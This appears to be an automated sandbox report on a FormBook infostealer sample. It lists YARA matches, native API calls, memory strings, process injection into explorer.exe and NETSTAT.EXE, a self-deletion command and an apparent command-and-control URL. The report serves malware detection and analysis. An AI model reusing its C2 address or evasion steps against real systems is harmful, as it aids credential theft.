Source: NQBNpLezqZKv1P4.exe, 00000000.00000003.641852644.0000000005525000.00000004.00000001.sdmp | String found in binary or memory: http://www.tiro.comicwf
Source: explorer.exe, 00000005.00000000.723822115.000000000B970000.00000002.00000001.sdmp | String found in binary or memory: http://www.typography.netD
Source: explorer.exe, 00000005.00000000.723822115.000000000B970000.00000002.00000001.sdmp | String found in binary or memory: http://www.urwpp.deDPlease
Source: NQBNpLezqZKv1P4.exe, 00000000.00000003.641678257.0000000005525000.00000004.00000001.sdmp, explorer.exe, 00000005.00000000.723822115.000000000B970000.00000002.00000001.sdmp | String found in binary or memory: http://www.zhongyicts.com.cn
Source: NQBNpLezqZKv1P4.exe, 00000000.00000003.641678257.0000000005525000.00000004.00000001.sdmp | String found in binary or memory: http://www.zhongyicts.com.cnue
Source: NETSTAT.EXE, 0000000A.00000002.903760107.0000000003AC2000.00000004.00000001.sdmp | String found in binary or memory: https://www.updates-app.com/4nn8/?Hdydvr=ihdw70LkX5hxMDN4QIP96

E-Banking Fraud:

Yara detected FormBook
Source: Yara match | File source: 4.2.NQBNpLezqZKv1P4.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 4.2.NQBNpLezqZKv1P4.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0000000A.00000002.902524326.0000000000B80000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 0000000A.00000002.902331087.0000000000950000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 0000000A.00000002.902873403.0000000002F40000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000004.00000002.771627554.00000000009D0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000004.00000002.772293876.0000000000AE0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000004.00000002.771173980.0000000000400000.00000040.00000001.sdmp, type: MEMORY

          System Summary:

          barindex
          Malicious sample detected (through community Yara rule)Show sources
          Source: 4.2.NQBNpLezqZKv1P4.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 4.2.NQBNpLezqZKv1P4.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 4.2.NQBNpLezqZKv1P4.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 4.2.NQBNpLezqZKv1P4.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 0000000A.00000002.902524326.0000000000B80000.00000040.00000001.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0000000A.00000002.902524326.0000000000B80000.00000040.00000001.sdmp, type: MEMORY | Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 0000000A.00000002.902331087.0000000000950000.00000040.00000001.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0000000A.00000002.902331087.0000000000950000.00000040.00000001.sdmp, type: MEMORY | Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 0000000A.00000002.902873403.0000000002F40000.00000004.00000001.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0000000A.00000002.902873403.0000000002F40000.00000004.00000001.sdmp, type: MEMORY | Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000004.00000002.771627554.00000000009D0000.00000040.00000001.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000004.00000002.771627554.00000000009D0000.00000040.00000001.sdmp, type: MEMORY | Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000004.00000002.772293876.0000000000AE0000.00000040.00000001.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000004.00000002.772293876.0000000000AE0000.00000040.00000001.sdmp, type: MEMORY | Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000004.00000002.771173980.0000000000400000.00000040.00000001.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000004.00000002.771173980.0000000000400000.00000040.00000001.sdmp, type: MEMORY | Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exe | Code function: 4_2_004181B0 NtCreateFile,
          Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exe | Code function: 4_2_00418260 NtReadFile,
          Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exe | Code function: 4_2_004182E0 NtClose,
          Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exe | Code function: 4_2_00418390 NtAllocateVirtualMemory,
          Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exe | Code function: 4_2_004181AC NtCreateFile,
          Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exe | Code function: 4_2_00418202 NtCreateFile,
          Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exe | Code function: 4_2_0041840A NtAllocateVirtualMemory,
          Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 10_2_03479710 NtQueryInformationToken,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 10_2_03479FE0 NtCreateMutant,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 10_2_03479780 NtMapViewOfSection,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 10_2_03479A50 NtCreateFile,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 10_2_03479650 NtQueryValueKey,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 10_2_03479660 NtAllocateVirtualMemory,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 10_2_034796D0 NtCreateKey,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 10_2_034796E0 NtFreeVirtualMemory,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 10_2_03479540 NtReadFile,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 10_2_03479910 NtAdjustPrivilegesToken,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 10_2_034795D0 NtClose,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 10_2_034799A0 NtCreateSection,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 10_2_03479840 NtDelayExecution,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 10_2_03479860 NtQuerySystemInformation,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 10_2_03479760 NtOpenProcess,
          Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 10_2_03479770 NtSetInformationFile,
          Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 10_2_0347A770 NtOpenThread,
          Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 10_2_03479B00 NtSetValueKey,
          Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 10_2_0347A710 NtOpenProcessToken,
          Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 10_2_03479730 NtQueryVirtualMemory,
          Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 10_2_034797A0 NtUnmapViewOfSection,
          Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 10_2_0347A3B0 NtGetContextThread,
          Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 10_2_03479670 NtQueryInformationProcess,
          Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 10_2_03479A00 NtProtectVirtualMemory,
          Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 10_2_03479610 NtEnumerateValueKey,
          Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 10_2_03479A10 NtQuerySection,
          Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 10_2_03479A20 NtResumeThread,
          Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 10_2_03479A80 NtOpenDirectoryObject,
          Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 10_2_03479950 NtQueueApcThread,
          Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 10_2_03479560 NtWriteFile,
          Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 10_2_03479520 NtWaitForSingleObject,
          Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 10_2_0347AD30 NtSetContextThread,
          Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 10_2_034799D0 NtCreateProcessEx,
          Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 10_2_034795F0 NtQueryInformationFile,
          Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 10_2_0347B040 NtSuspendThread,
          Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 10_2_03479820 NtEnumerateKey,
          Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 10_2_034798F0 NtReadVirtualMemory,
          Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 10_2_034798A0 NtWriteVirtualMemory,
          Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 10_2_009681B0 NtCreateFile,
          Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 10_2_009682E0 NtClose,
          Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 10_2_00968260 NtReadFile,
          Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 10_2_00968390 NtAllocateVirtualMemory,
          Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 10_2_009681AC NtCreateFile,
          Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 10_2_00968202 NtCreateFile,
          Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 10_2_0096840A NtAllocateVirtualMemory,
          Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exe | Code function: 4_2_0041B84A
          Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exe | Code function: 4_2_00401030
          Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exe | Code function: 4_2_00408C4C
          Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exe | Code function: 4_2_00408C50
          Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exe | Code function: 4_2_0041B496
          Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exe | Code function: 4_2_0041CD52
          Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exe | Code function: 4_2_0041C514
          Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exe | Code function: 4_2_0041C527
          Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exe | Code function: 4_2_00402D88
          Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exe | Code function: 4_2_00402D90
          Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exe | Code function: 4_2_0041CDA7
          Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exe | Code function: 4_2_0041CE79
          Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exe | Code function: 4_2_0041BE0B
          Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exe | Code function: 4_2_0041CF31
          Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exe | Code function: 4_2_00402FB0
          Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exe | Code function: 4_2_0049BF7F
          Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 10_2_0346EBB0
          Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 10_2_03456E30
          Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 10_2_03501D55
          Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 10_2_0343F900
          Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 10_2_03430D20
          Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 10_2_03454120
          Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 10_2_0344D5E0
          Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 10_2_03462581
          Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 10_2_034F1002
          Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 10_2_0344841F
          Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 10_2_0344B090
          Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 10_2_0096B496
          Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 10_2_00958C50
          Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 10_2_00958C4C
          Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 10_2_00952D90
          Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 10_2_00952D88
          Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 10_2_0096CDA7
          Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 10_2_0096C514
          Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 10_2_0096C527
          Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 10_2_0096CD52
          Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 10_2_0096CE79
          Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 10_2_00952FB0
          Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 10_2_0096CF31
          Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: String function: 0343B150 appears 32 times
          Source: NQBNpLezqZKv1P4.exe, 00000000.00000000.636900304.0000000000102000.00000002.00020000.sdmp | Binary or memory string: OriginalFilenameFixedBufferAttribu.exe8 vs NQBNpLezqZKv1P4.exe
          Source: NQBNpLezqZKv1P4.exe | Binary or memory string: OriginalFilename vs NQBNpLezqZKv1P4.exe
          Source: NQBNpLezqZKv1P4.exe, 00000004.00000003.697053653.0000000000DD6000.00000004.00000001.sdmp | Binary or memory string: OriginalFilenamentdll.dllj% vs NQBNpLezqZKv1P4.exe
          Source: NQBNpLezqZKv1P4.exe, 00000004.00000002.772592916.0000000000BCA000.00000004.00000020.sdmp | Binary or memory string: OriginalFilenamenetstat.exej% vs NQBNpLezqZKv1P4.exe
          Source: NQBNpLezqZKv1P4.exe, 00000004.00000000.696683735.0000000000492000.00000002.00020000.sdmp | Binary or memory string: OriginalFilenameFixedBufferAttribu.exe8 vs NQBNpLezqZKv1P4.exe
          Source: NQBNpLezqZKv1P4.exe | Binary or memory string: OriginalFilenameFixedBufferAttribu.exe8 vs NQBNpLezqZKv1P4.exe
          Source: NQBNpLezqZKv1P4.exe | Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
          Source: 4.2.NQBNpLezqZKv1P4.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 4.2.NQBNpLezqZKv1P4.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 4.2.NQBNpLezqZKv1P4.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 4.2.NQBNpLezqZKv1P4.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 0000000A.00000002.902524326.0000000000B80000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0000000A.00000002.902524326.0000000000B80000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 0000000A.00000002.902331087.0000000000950000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0000000A.00000002.902331087.0000000000950000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 0000000A.00000002.902873403.0000000002F40000.00000004.00000001.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0000000A.00000002.902873403.0000000002F40000.00000004.00000001.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000004.00000002.771627554.00000000009D0000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000004.00000002.771627554.00000000009D0000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000004.00000002.772293876.0000000000AE0000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000004.00000002.772293876.0000000000AE0000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000004.00000002.771173980.0000000000400000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000004.00000002.771173980.0000000000400000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: NQBNpLezqZKv1P4.exe | Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
          Source: NQBNpLezqZKv1P4.exe, ControlePorTwitter/Business/Seguranca.cs | Cryptographic APIs: 'CreateDecryptor'
          Source: 0.0.NQBNpLezqZKv1P4.exe.100000.0.unpack, ControlePorTwitter/Business/Seguranca.cs | Cryptographic APIs: 'CreateDecryptor'
          Source: 4.0.NQBNpLezqZKv1P4.exe.490000.0.unpack, ControlePorTwitter/Business/Seguranca.cs | Cryptographic APIs: 'CreateDecryptor'
          Source: 4.2.NQBNpLezqZKv1P4.exe.490000.1.unpack, ControlePorTwitter/Business/Seguranca.cs | Cryptographic APIs: 'CreateDecryptor'
          Source: classification engine | Classification label: mal100.troj.evad.winEXE@7/1@7/6
          Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exe | File created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\NQBNpLezqZKv1P4.exe.log
          Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6324:120:WilError_01
          Source: NQBNpLezqZKv1P4.exe | Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
          Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exe | Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
          Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
          Source: C:\Windows\explorer.exe | File read: C:\Windows\System32\drivers\etc\hosts
          Source: C:\Windows\explorer.exe | File read: C:\Windows\System32\drivers\etc\hosts
          Source: unknown | Process created: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exe 'C:\Users\user\Desktop\NQBNpLezqZKv1P4.exe'
          Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exe | Process created: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exe C:\Users\user\Desktop\NQBNpLezqZKv1P4.exe
          Source: C:\Windows\explorer.exe | Process created: C:\Windows\SysWOW64\NETSTAT.EXE C:\Windows\SysWOW64\NETSTAT.EXE
          Source: C:\Windows\SysWOW64\NETSTAT.EXE | Process created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\NQBNpLezqZKv1P4.exe'
          Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exe | Process created: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exe C:\Users\user\Desktop\NQBNpLezqZKv1P4.exe
          Source: C:\Windows\SysWOW64\NETSTAT.EXE | Process created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\NQBNpLezqZKv1P4.exe'
          Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exe | File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
          Source: NQBNpLezqZKv1P4.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
          Source: NQBNpLezqZKv1P4.exe | Static PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
          Source: Binary string: netstat.pdbGCTL source: NQBNpLezqZKv1P4.exe, 00000004.00000002.772592916.0000000000BCA000.00000004.00000020.sdmp
          Source: Binary string: wscui.pdbUGP source: explorer.exe, 00000005.00000000.715863977.0000000005A00000.00000002.00000001.sdmp
          Source: Binary string: netstat.pdb source: NQBNpLezqZKv1P4.exe, 00000004.00000002.772592916.0000000000BCA000.00000004.00000020.sdmp
          Source: Binary string: wntdll.pdbUGP source: NQBNpLezqZKv1P4.exe, 00000004.00000002.772737202.0000000000FF0000.00000040.00000001.sdmp, NETSTAT.EXE, 0000000A.00000002.903338998.000000000352F000.00000040.00000001.sdmp
          Source: Binary string: wntdll.pdb source: NQBNpLezqZKv1P4.exe, 00000004.00000002.772737202.0000000000FF0000.00000040.00000001.sdmp, NETSTAT.EXE
          Source: Binary string: wscui.pdb source: explorer.exe, 00000005.00000000.715863977.0000000005A00000.00000002.00000001.sdmp
          Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exe | Code function: 4_2_0041522D push esi; retf
          Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exe | Code function: 4_2_0041B3F2 push eax; ret
          Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exe | Code function: 4_2_0041B3FB push eax; ret
          Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exe | Code function: 4_2_0041B3A5 push eax; ret
          Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exe | Code function: 4_2_0041B45C push eax; ret
          Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exe | Code function: 4_2_0040F646 push edi; retf
          Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exe | Code function: 4_2_00415628 push ss; iretd
          Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exe | Code function: 4_2_00414E32 push ds; iretd
          Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 10_2_0348D0D1 push ecx; ret
          Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 10_2_0096522D push esi; retf
          Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 10_2_0096B3A5 push eax; ret
          Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 10_2_0096B3F2 push eax; ret
          Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 10_2_0096B3FB push eax; ret
          Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 10_2_0096B45C push eax; ret
          Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 10_2_00964E32 push ds; iretd
          Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 10_2_00965628 push ss; iretd
          Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 10_2_0095F646 push edi; retf
          Source: initial sample | Static PE information: section name: .text entropy: 7.57888986763
          Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exe | Process information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exe | Process information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exe | Process information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exe | Process information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exe | Process information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exe | Process information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exe | Process information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exe | Process information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exe | Process information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exe | Process information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exe | Process information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exe | Process information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exe | Process information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exe | Process information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exe | Process information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exe | Process information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exe | Process information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exe | Process information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exe | Process information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exe | Process information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exe | Process information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exe | Process information set: NOOPENFILEERRORBOX
